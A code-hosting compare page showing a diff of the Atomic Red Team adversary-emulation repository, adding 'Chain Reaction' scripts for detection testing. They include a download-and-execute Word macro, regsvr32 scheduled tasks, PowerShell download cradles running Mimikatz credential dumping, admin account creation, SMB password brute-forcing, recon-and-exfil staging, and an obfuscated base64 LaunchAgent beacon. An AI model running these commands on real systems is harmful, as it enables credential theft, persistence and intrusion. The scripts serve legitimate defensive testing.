security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Compare commits

merge into: security-tools/atomic-red-team:clr2of8-patch-32
Branches Tags
security-tools/atomic-red-team:master security-tools/atomic-red-team:dependabot/pip/typer-0.25.1 security-tools/atomic-red-team:dependabot/pip/hypothesis-6.152.4 security-tools/atomic-red-team:remove_ruby security-tools/atomic-red-team:attack-v19-migration security-tools/atomic-red-team:dependabot/pip/pydantic-2.13.3 security-tools/atomic-red-team:fix_attack_nav security-tools/atomic-red-team:markdown_changes security-tools/atomic-red-team:external_payloads security-tools/atomic-red-team:use-basic-parsing security-tools/atomic-red-team:pre-commit security-tools/atomic-red-team:python_conversion security-tools/atomic-red-team:issue_template_fix security-tools/atomic-red-team:insecure-curl security-tools/atomic-red-team:T1553.001_fix security-tools/atomic-red-team:npm_simulate security-tools/atomic-red-team:remove_bin security-tools/atomic-red-team:T1016_fix security-tools/atomic-red-team:cloudlfare-tunnel security-tools/atomic-red-team:remove_users_launch_daemon security-tools/atomic-red-team:sysmon_fix security-tools/atomic-red-team:fix_T1562.001 security-tools/atomic-red-team:cyberbuff-patch-2 security-tools/atomic-red-team:yamlfix security-tools/atomic-red-team:remove-unused-static-dir security-tools/atomic-red-team:clr2of8-patch-44 security-tools/atomic-red-team:clr2of8-patch-43 security-tools/atomic-red-team:clr2of8-patch-35 security-tools/atomic-red-team:clr2of8-patch-32 security-tools/atomic-red-team:t1547008 security-tools/atomic-red-team:atoms security-tools/atomic-red-team:clr2of8-patch-16 security-tools/atomic-red-team:clr2of8-patch-14 security-tools/atomic-red-team:testest security-tools/atomic-red-team:linpeas_linux security-tools/atomic-red-team:AutoSUID_linux security-tools/atomic-red-team:clr2of8-patch-8 security-tools/atomic-red-team:T1218.005-powershell-without-network-call security-tools/atomic-red-team:revert-1530-adding_comments_to_navigator security-tools/atomic-red-team:add_codeowners security-tools/atomic-red-team:clr2of8-patch-3 security-tools/atomic-red-team:oscd security-tools/atomic-red-team:admin-guide security-tools/atomic-red-team:APT28 security-tools/atomic-red-team:update-PSDocs security-tools/atomic-red-team:io-update security-tools/atomic-red-team:ProcessHolllowingT1093
..
pull from: security-tools/atomic-red-team:io-update
Branches Tags
security-tools/atomic-red-team:dependabot/pip/typer-0.25.1 security-tools/atomic-red-team:master security-tools/atomic-red-team:dependabot/pip/hypothesis-6.152.4 security-tools/atomic-red-team:remove_ruby security-tools/atomic-red-team:attack-v19-migration security-tools/atomic-red-team:dependabot/pip/pydantic-2.13.3 security-tools/atomic-red-team:fix_attack_nav security-tools/atomic-red-team:markdown_changes security-tools/atomic-red-team:external_payloads security-tools/atomic-red-team:use-basic-parsing security-tools/atomic-red-team:pre-commit security-tools/atomic-red-team:python_conversion security-tools/atomic-red-team:issue_template_fix security-tools/atomic-red-team:insecure-curl security-tools/atomic-red-team:T1553.001_fix security-tools/atomic-red-team:npm_simulate security-tools/atomic-red-team:remove_bin security-tools/atomic-red-team:T1016_fix security-tools/atomic-red-team:cloudlfare-tunnel security-tools/atomic-red-team:remove_users_launch_daemon security-tools/atomic-red-team:sysmon_fix security-tools/atomic-red-team:fix_T1562.001 security-tools/atomic-red-team:cyberbuff-patch-2 security-tools/atomic-red-team:yamlfix security-tools/atomic-red-team:remove-unused-static-dir security-tools/atomic-red-team:clr2of8-patch-44 security-tools/atomic-red-team:clr2of8-patch-43 security-tools/atomic-red-team:clr2of8-patch-35 security-tools/atomic-red-team:clr2of8-patch-32 security-tools/atomic-red-team:t1547008 security-tools/atomic-red-team:atoms security-tools/atomic-red-team:clr2of8-patch-16 security-tools/atomic-red-team:clr2of8-patch-14 security-tools/atomic-red-team:testest security-tools/atomic-red-team:linpeas_linux security-tools/atomic-red-team:AutoSUID_linux security-tools/atomic-red-team:clr2of8-patch-8 security-tools/atomic-red-team:T1218.005-powershell-without-network-call security-tools/atomic-red-team:revert-1530-adding_comments_to_navigator security-tools/atomic-red-team:add_codeowners security-tools/atomic-red-team:clr2of8-patch-3 security-tools/atomic-red-team:oscd security-tools/atomic-red-team:admin-guide security-tools/atomic-red-team:APT28 security-tools/atomic-red-team:update-PSDocs security-tools/atomic-red-team:io-update security-tools/atomic-red-team:ProcessHolllowingT1093

1 Commits
clr2of8-patch-32 .. io-update

Author SHA1 Message Date
Michael Haag cc15adc96c Spreadsheet URL - 404 
Received a 404 on the direct link to spreadsheet. I changed it to the spreadsheet directory, in case it changes or new things are added over time.
 2019-02-08 09:01:42 -07:00
1215 changed files with 150559 additions and 667349 deletions
Expand all files Collapse all files
.circleci/config.yml
+51
View File
@@ -0,0 +1,51 @@
version: 2
defaults: &defaults
docker:
- image: circleci/ruby:2.4
workflows:
version: 2
validate-then-generate-docs:
jobs:
- validate_atomics_generate_docs
jobs:
validate_atomics_generate_docs:
<<: *defaults
steps:
- checkout
- add_ssh_keys
- run:
name: Validate the format of atomic tests against the spec
command: |
bin/validate-atomics.rb
- run:
name: Generate nice markdown document for atomics
command: |
bin/generate-atomic-docs.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing documentation because there are no changes"
#elif [[ "${CIRCLE_BRANCH}" == "master" ]]; then
# echo "Not committing documentation because we are on master and doc changes should be part of pull request branches"
elif [[ $(echo "$CIRCLE_BRANCH" | grep -c "pull") -gt 0 ]]; then
echo "Not committing documentation because we are on a pull request branch that we don't have push permissions to"
else
git config credential.helper 'cache --timeout=120'
git config user.email "<email>"
git config user.name "CircleCI Atomic Red Team doc generator"
git add atomics
git commit -am "Generate docs from job=$CIRCLE_JOB branch=$CIRCLE_BRANCH"
git push -u origin $CIRCLE_BRANCH
fi
.github/ISSUE_TEMPLATE/idea.md
-29
View File
@@ -1,29 +0,0 @@
---
name: Idea
about: An idea for a feature or improvement to Atomic Red Team.
title: 'Idea: '
labels: 'idea'
assignees: ''
---
### Use-cases
<!---
In order to properly evaluate a feature request, it is necessary to understand the use-cases for it.
Please describe below the _end goal_ you are trying to achieve that has led you to request this feature.
Please keep this section focused on the problem and not on the suggested solution. We'll get to that in a moment, below!
-->
### Proposal
<!---
If you have an idea for a way to address the problem via a change, please describe it below.
If you're not sure of some details, don't worry! When we evaluate the feature request we may suggest modifications.
-->
### References
<!--
Anything else, such as links to other issues or examples, that didn't seem to fit above.
-->
.github/ISSUE_TEMPLATE/new_atomic.md
-19
View File
@@ -1,19 +0,0 @@
---
name: Submit a new test
about: Submit a new Atomic Red Team atomic test.
title: 'TXXX: Your test name here'
labels: 'new-test'
assignees: ''
---
<!--
For reference, check out this article that explains how to properly submit a new atomic test: https://atomicredteam.io/contributing#how-to-contribute.
-->
### Technique ID: TXXXX
### Additional Details
<!--
Anything you'd like to share or explain that isn't represented in the contents of the YAML-based test definition.
-->
.github/ISSUE_TEMPLATE/website_change.md
-19
View File
@@ -1,19 +0,0 @@
---
name: Website change
about: Propose a change to the website at https://atomicredteam.io
title: 'Website: '
labels: 'website'
assignees: ''
---
### Why the change?
### A summary of the change
### References
<!--
Anything else, such as links to other issues or examples, that didn't seem to fit above.
-->
.github/ISSUE_TEMPLATE/problem_report.md → .github/issue_template.md
+2 -8
View File
@@ -1,11 +1,5 @@
---
name: Problem
about: Tell us about a problem you've encountered.
title: 'Problem: '
labels: 'problem'
assignees: ''
# Report
---
## What did you do?
Please replace this with what you did.
@@ -29,4 +23,4 @@ e.g. 💥
* If relevant, which [execution harness](2) are you attempting to use?
[1]: https://github.com/redcanaryco/atomic-red-team/tree/master/atomics "atomic tests"
[2]: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks "execution frameworks"
[2]: https://github.com/redcanaryco/atomic-red-team/tree/master/execution-frameworks "execution frameworks"
.github/workflows/generate-docs.yml
-63
View File
@@ -1,63 +0,0 @@
name: generate-docs
on:
push:
branches:
- master
jobs:
generate-docs:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v2
with:
token: ${{ secrets.PROTECTED_BRANCH_PUSH_TOKEN }}
ref: 'master'
- name: setup ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: 2.7
bundler-cache: true
- name: Generate and commit unique GUIDs for each atomic test
run: |
bin/generate-guids.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing GUID changes because there are no changes"
else
git config credential.helper 'cache --timeout=120'
git config user.email "opensource@redcanary.com"
git config user.name "Atomic Red Team GUID generator"
git add atomics
git commit -am "Generate GUIDs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [skip ci]"
git push origin $GITHUB_REF_NAME -f
fi
- name: generate markdown docs for atomics
run: |
bin/generate-atomic-docs.rb
echo ""
echo ""
git status
echo ""
echo ""
git diff-index HEAD --
if git diff-index --quiet HEAD -- ; then
echo "Not committing documentation because there are no changes"
else
git config credential.helper 'cache --timeout=120'
git config user.email "opensource@redcanary.com"
git config user.name "Atomic Red Team doc generator"
git add atomics
git commit -am "Generated docs from job=$GITHUB_JOB branch=$GITHUB_REF_NAME [ci skip]"
git push origin $GITHUB_REF_NAME -f
fi
.github/workflows/validate-atomics.yml
-22
View File
@@ -1,22 +0,0 @@
name: validate-atomics
on:
push:
branches: [ master ]
pull_request:
branches: [ master ]
jobs:
validate-atomics:
runs-on: ubuntu-latest
steps:
- name: checkout repo
uses: actions/checkout@v2
- name: setup ruby
uses: ruby/setup-ruby@v1
with:
ruby-version: 2.7
bundler-cache: true
- name: validate the format of atomics tests against the spec
run: |
bin/validate-atomics.rb
.gitignore
-21
View File
@@ -2,28 +2,7 @@
.DS_Store
.vscode
.atom
atomic-red-team/enterprise-attack.json
# Compiled Object files
*.slo
*.lo
*.o
*.obj
# vs logs
*.tlog
*.log
# Precompiled Headers
*.gch
*.pch
docs/.sass-cache/
docs/_site/
**/Invoke-AtomicTest-ExecutionLog.csv
techniques_hash.db
# Credential files
*.creds
ARTifacts/Adversary/Dragons_Tail/DragonsTail.vba
+48
View File
@@ -0,0 +1,48 @@
' Save Document As Single Web Page .mht
' Rename Document As .Doc
' This Document is modeled after FireEye's report on APT32
' Special Thanks to Nick Carr for his work on this write-up
' https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
Sub AutoOpen()
Dim myURL As String
Dim myPath As String
If (MsgBox("You're Are About To Execute the ATOMIC Test for Dragon's Tail, You sure?", 1, vbMsgBoxSetForeground) = 2) Then
End ' This Ends Macro
End If
' Downloads Dragon's Tail Chain Reaction Script
myURL = "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat"
Dim WinHttpReq As Object
Set WinHttpReq = CreateObject("Microsoft.XMLHTTP")
WinHttpReq.Open "GET", myURL, False, "username", "password"
WinHttpReq.send
myURL = WinHttpReq.responseBody
If WinHttpReq.Status = 200 Then
Set oStream = CreateObject("ADODB.Stream")
oStream.Open
oStream.Type = 1
oStream.Write WinHttpReq.responseBody
Dim fso As Object
Const FLDR_NAME As String = "C:\Tools\"
Set fso = CreateObject("Scripting.FileSystemObject")
If Not fso.FolderExists(FLDR_NAME) Then
fso.CreateFolder (FLDR_NAME)
End If
' Change Path HERE
oStream.SaveToFile "C:\Tools\NothingToSeeHere.bat", 2 ' 1 = no overwrite, 2 = overwrite
' EXECUTE FROM PATH
Shell "cmd.exe /c C:\Tools\NothingToSeeHere.bat"
oStream.Close
End If
End Sub
ARTifacts/Adversary/Dragons_Tail/README.md
+2
View File
@@ -0,0 +1,2 @@
### Group: Dragon's Tail
[Modeled After G0050](https://attack.mitre.org/wiki/Group/G0050)
ARTifacts/Chain_Reactions/README.md
+1
View File
@@ -0,0 +1 @@
# Chain Reactions
ARTifacts/Chain_Reactions/atomic-hello
Executable
BIN
View File
Binary file not shown.
ARTifacts/Chain_Reactions/atomic-hello.c
+11
View File
@@ -0,0 +1,11 @@
#include <stdio.h>
// Simple Hello World for Atomic Red Team payload
int main() {
printf("Hello from Atomic Red Team! \n");
return 0;
}
ARTifacts/Chain_Reactions/atomic-hello.macos
Executable
BIN
View File
Binary file not shown.
ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1
+19
View File
@@ -0,0 +1,19 @@
# Chain Reaction: Argonaut
# Tactics: Execution:Powershell, Discovery
# variable can be changed to $userprofile to drop the bat elsewhere
# TEMP=C:\Users\<username>\AppData\Local\Temp
$temp = $env:temp
# Note that these are alias' for Invoke-WebRequest.
# The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc)
wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\1.bat
# Alternate Ending: Using curl
curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\2.bat
# Execute the 1.bat file
cmd.exe /c $temp\1.bat
ARTifacts/Chain_Reactions/chain_reaction_Cyclotron.bat
+29
View File
@@ -0,0 +1,29 @@
::Chain Reaction - Cyclotron
::
:: In this test we will executing a binary multiple ways.
:: Some of these are Application Whitelisting Bypasses
:: Either Clone the Repo, or Download the AllTheThings DLL Somehow ;-)
REM X86
Executing X86 AllTheThings Test
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThingsx86.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U AllTheThingsx86.dll
regsvr32.exe /s /u AllTheThingsx86.dll
regsvr32.exe /s AllTheThingsx86.dll
rundll32 AllTheThingsx86.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx86.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx86.dll
REM AMD64
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe AllTheThingsx64.dll
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U AllTheThingsx64.dll
regsvr32.exe /s /u AllTheThingsx64.dll
regsvr32.exe /s AllTheThingsx64.dll
rundll32 AllTheThingsx64.dll,EntryPoint
odbcconf.exe /s /a { REGSVR AllTheThingsx64.dll }
regsvr32.exe /s /n /i:"Some String To Do Things ;-)" AllTheThingsx64.dll
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.bat
+42
View File
@@ -0,0 +1,42 @@
:: Adversary Group: https://attack.mitre.org/wiki/Group/G0050
:: xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
:: Thanks to Nick Carr for his research on this group
:: Sample Representation of ATT&CK Techniques used by APT32
:: Tactics: Execution, Persistence, Privilege Escalation
:: Tactic: Privilege Escalation / Execution
:: Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
:: Tactics: Execution
:: Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
:: Tactics: Defense Evasion
:: Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
:: Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
:: To Encode A Command
:: $Text = '$file=(gi test.txt);$date=''7/16/1945 5:29am'';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date'
:: $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
:: $EncodedText =[Convert]::ToBase64String($Bytes)
:: $EncodedText
echo "Atomic Test File" > test.txt
::PowerShell.exe -com {$file=(gi test.txt);$date = '7/16/1945 5:29am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}
PowerShell.exe -enc JABmAGkAbABlAD0AKABnAGkAIAB0AGUAcwB0AC4AdAB4AHQAKQA7ACQAZABhAHQAZQA9ACcANwAvADEANgAvADEAOQA0ADUAIAA1ADoAMgA5AGEAbQAnADsAJABmAGkAbABlAC4ATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEwAYQBzAHQAQQBjAGMAZQBzAHMAVABpAG0AZQA9ACQAZABhAHQAZQA7ACQAZgBpAGwAZQAuAEMAcgBlAGEAdABpAG8AbgBUAGkAbQBlAD0AJABkAGEAdABlAA==
:: Tactics: Defense Evasion
:: technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
:: Deletes File, detection here would be File Modification
::del test.txt
ARTifacts/Chain_Reactions/chain_reaction_DragonsTail.ps1
+37
View File
@@ -0,0 +1,37 @@
# Adversary Group: https://attack.mitre.org/wiki/Group/G0050
# xref: https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
# Thanks to Nick Carr for his research on this group
# Sample Representation of ATT&CK Techniques used by APT32
# Tactics: Execution, Persistence, Privilege Escalation
# Tactic: Privilege Escalation / Execution
# Technique: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
# Create Scheduled Task With RegSv32 Payload
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
SCHTASKS /Run /TN "Atomic Testing"
SCHTASKS /Delete /TN "Atomic Testing" /F
# Tactics: Execution
# Technique: PowerShell https://attack.mitre.org/wiki/Technique/T1086
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"
# Tactics: Defense Evasion
# Technique: Timestomp https://attack.mitre.org/wiki/Technique/T1099
# Source: https://gist.github.com/obscuresec/7b0cf71d7a8dd5e7b54c
$test = "Atomic Test File"
set-content -path test.txt -value $test
$file=(gi test.txt);$date='7/16/1945 5:29 am';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date
# Tactics: Defense Evasion
# technique: File Deletion https://attack.mitre.org/wiki/Technique/T1107
# Deletes File, detection here would be File Modification
del test.txt
Write-Host "Done" -Fore Green
ARTifacts/Chain_Reactions/chain_reaction_Fission.bat
+56
View File
@@ -0,0 +1,56 @@
:: Chain Reaction - Fission
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
::
:: This particular Chain Reaction focuses on Discovery.
:: Tactic: Discovery
:: Technique: Remote System Discovery https://attack.mitre.org/wiki/Technique/T1018
:: Change IP scheme for your environment
:: for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i > ping_output.txt
net.exe view
net.exe view /domain
:: Tactic: Discovery
:: Technique: Account Discovery https://attack.mitre.org/wiki/Windows_Technique_Matrix
net localgroup "administrators"
wmic useraccount get /ALL
:: Tactic: Discovery
:: Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show all profiles
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Execution
:: Tactic: Discovery
:: Technique: System Network Configuration Discovery https://attack.mitre.org/wiki/Technique/T1016
ipconfig /all
arp -a
nbtstat -n
:: Tactic: Discovery
:: Technique: File and Directory Discovery https://attack.mitre.org/wiki/Technique/T1083
dir /s c:\ >> %temp%\download
:: Tactic: Execution
:: Technique: Powershell https://attack.mitre.org/wiki/Technique/T1086
:: Download and invoke BloodHound Ingestor
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/BloodHoundAD/BloodHound/master/Ingestors/BloodHound_Old.ps1'); Get-BloodHoundData"
ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat
+33
View File
@@ -0,0 +1,33 @@
:: Chain Reaction 01
::
:: NOTE it is a BAD idea to execute scripts from a repo that you do not control.
:: NOTE We recommend executing from a server that you control.
:: NOTE Thank You :)
:: This particular Chain Reaction focuses on generating event noise.
:: Tactics: Persistence, Defense Evasion
:: Scheduled Task https://attack.mitre.org/wiki/Technique/T1053
:: RegSvr32 https://attack.mitre.org/wiki/Technique/T1117
:: This particular technique will reach out to the github repository (network) and spawn calc (process) every 30 minutes.
SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/RegSvr32.sct scrobj.dll" /mo 30
:: Tactic: Discovery
:: Execution: https://attack.mitre.org/wiki/Technique/T1086
:: Have PowerShell download the Discovery.bat, output to a local file (for review later)
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt
:: Tactic: Credential Access
:: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136
:: Add a user, then add to group
Net user /add Trevor SmshBgr123
:: Add user to group
net localgroup administrators Trevor /add
ECHO Well that was fun!
pause
ARTifacts/Chain_Reactions/chain_reaction_Ranger.sh
Executable
+106
View File
@@ -0,0 +1,106 @@
#!/bin/sh
# Chain Reaction Ranger
# NOTE it is a BAD idea to execute scripts from a repo that you do not control.
# NOTE We recommend executing from a server that you control.
# NOTE Thank You :)
# This particular Chain Reaction focuses on simulating reconnaisance and staging files for exfiltration
# Tactic: Collection
# Technique: Data Staged https://attack.mitre.org/wiki/Technique/T1074
# Tactic: Defense Evasion
# Technique: Hidden Files and Directories https://attack.mitre.org/wiki/Technique/T1158
# Create a hidden directory to store our collected data in
mkdir -p /tmp/.staging_art/
mkdir -p /tmp/.exfil/
# Tactic: Discovery
# Technique: System Information Discovery https://attack.mitre.org/wiki/Technique/T1082
# Determine Platform and Gather System Information
SYSINF=/tmp/.staging_art/system.txt
MACCHECK="$(sw_vers -productName | cut -d ' ' -f1)"
if [[ "$MACCHECK" == "Mac" ]]; then
PLAT="Mac"
else
PLAT="Linux"
fi
echo "Testing: Platform is" $PLAT
echo "Platform: " $PLAT >> $SYSINF
echo "Kernel:" >> $SYSINF && uname -a >> $SYSINF
echo "Testing: Gathering General Release Information"
if [ "$PLAT" = "Mac" ]; then
echo "Testing: Gathering macOS Release Information"
echo "System Profiler:" >> $SYSINF
system_profiler >> $SYSINF 2> /dev/null
else
echo "Testing: Gathering Linux Release Information"
echo "Release:" >> $SYSINF
lsb_release >> $SYSINF 2> /dev/null
fi
# Tactic: Discovery
# Technique: Account Discovery https://attack.mitre.org/wiki/Technique/T1087
# Collect User Account Information
USERINF=/tmp/.staging_art/users.txt
echo "Testing: Gathering User Information"
echo "Whoami:" >> $USERINF && whoami >> $USERINF
echo "Current User Activity:" >> $USERINF && w >> $USERINF 2> /dev/null
echo "Sudo Privs" >> $USERINF && sudo -l -n >> $USERINF 2> /dev/null
echo "Sudoers" >> $USERINF && cat /etc/sudoers >> $USERINF 2> /dev/null
echo "Last:" >> $USERINF && last >> $USERINF 2> /dev/null
if [ "$PLAT" == "Mac" ]; then
echo "Testing: Gathering Mac Group Information"
echo "Group Information:" >> $USERINF
dscl . list /Groups >> $USERINF
dscacheutil -q group >> $USERINF
else
echo "Testing: Gathering Linux Group Information"
echo "Group Information:" >> $USERINF
cat /etc/passwd >> $USERINF
echo "Elevated Users" >> $USERINF && grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' >> $USERINF
fi
# Tactic: Discovery
# Technique: Security Software Discovery https://attack.mitre.org/wiki/Technique/T1063
# Check for common security Software
SECINF=/tmp/.staging_art/security.txt
echo "Testing: Gathering Security Software Information"
echo "Running Security Processes" >> $SECINF && ps ax | grep -v grep | grep -e Carbon -e Snitch -e OpenDNS -e RTProtectionDaemon -e CSDaemon -e cma >> $SECINF
# Tacttic: Exfiltration
# Technique: Data Compresssed https://attack.mitre.org/wiki/Technique/T1002
# Technique: Data Encrypted https://attack.mitre.org/wiki/Technique/T1022
# Compress and encrypt all collected data
echo "Testing: Zip up the Recon"
zip --password "Hope You Have Eyes on This!!" /tmp/.staging_art/loot.zip /tmp/.staging_art/* > /dev/null 2>&1
# Tacttic: Exfiltration
# Technique: Data Transfer Size Limits https://attack.mitre.org/wiki/Technique/T1030
# Split the file up into 23 byte chunks for easier exfiltration
echo "Testing: Split the file for Exfil"
split -a 15 -b 23 "/tmp/.staging_art/loot.zip" "/tmp/.exfil/loot.zip.part-"
# Tactic: Defense Evasion
# Technique: Delete File https://attack.mitre.org/wiki/Technique/T1107
# Delete evidence
rm -rf /tmp/.staging_art/
# Optionally, delete exfil directory to clean up
# rm -rf /tmp/.exfil/
ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat
+49
View File
@@ -0,0 +1,49 @@
:: Chain Reaction - Reactor
::
::
:: Tactic: Discovery
:: Technique: System Owner/User Discovery: https://attack.mitre.org/wiki/Technique/T1033
:: Single Endpoint
:: for /F "tokens=1,2" %%i in ('qwinsta /server:<COMPUTERNAME> ^| findstr "Active Disc"') do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Multiple Endpoints
@FOR /F %%n in (computers.txt) DO @FOR /F "tokens=1,2" %%i in ('qwinsta /server:%%n ^| findstr "Active Disc") do @echo %%i | find /v "#" | find /v "console" || echo %%j > usernames.txt
:: Tactic: Credential Access, Lateral Movement
:: Technique: Brute Force: https://attack.mitre.org/wiki/Technique/T1110
:: Technique: Windows Admin Shares: https://attack.mitre.org/wiki/Technique/T1077
@FOR /F %%n in (usernames.txt) DO @FOR /F %%p in (passwords.txt) DO @net use \\COMPANYDC1\IPC$ /user:COMPANY\%%n %%p 1>NUL 2>&1 && @echo [*] %%n:%%p && @net use /delete \\COMPANYDC1\IPC$ > NUL
:: Tactic: Discovery
:: Technique: Security Software Discovery: https://attack.mitre.org/wiki/Technique/T1063
netsh.exe advfirewall firewall show rule name=all
tasklist.exe | findstr cb
tasklist.exe | findstr virus
tasklist.exe | findstr defender
:: Tactic: Execution, Discovery
:: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086
:: Technique: Multiple Discovery
powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
:: Tactic: Collection
:: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119
for /R c: %%f in (*.docx) do copy %%f c:\temp\
:: Tactic: Exfiltration
:: Technique: Data Compressed: https://attack.mitre.org/wiki/Technique/T1002
cmd.exe /c powershell.exe Compress-Archive -Path C:\temp\* -CompressionLevel Optimal -DestinationPath C:\temp\allthedataz.zip
ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
+16
View File
@@ -0,0 +1,16 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>cookie-miner-backdoor-launchagent.plist</string>
<key>ProgramArguments</key>
<array>
<string>python</string>
<string>-c</string>
<string>import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly9hdG9taWNyZWR0ZWFtLmlvJzt0PScvbmV3cy5waHAnO3JlcT11cmxsaWIyLlJlcXVlc3Qoc2VydmVyK3QpOwpyZXEuYWRkX2hlYWRlcignVXNlci1BZ2VudCcsVUEpOwpyZXEuYWRkX2hlYWRlcignQ29va2llJywic2Vzc2lvbj1CbUhpVzdVQS9zZjlDMjc5b0Uyb3dLOUxaMGM9Iik7CnByb3h5ID0gdXJsbGliMi5Qcm94eUhhbmRsZXIoKTsKbyA9IHVybGxpYjIuYnVpbGRfb3BlbmVyKHByb3h5KTsKdXJsbGliMi5pbnN0YWxsX29wZW5lcihvKTsKYT11cmxsaWIyLnVybG9wZW4ocmVxKS5yZWFkKCk7'));</string>
</array>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
+14
View File
@@ -0,0 +1,14 @@
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
